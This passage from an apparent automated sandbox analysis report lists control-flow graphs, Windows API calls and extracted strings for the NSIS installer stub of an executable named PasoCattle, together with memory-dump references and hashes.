DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                          APIs
                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                          • String ID: jF
                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                                                          • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                          • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                          • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                          Strings
                                                                                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                                                                                          • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                          • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                          • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
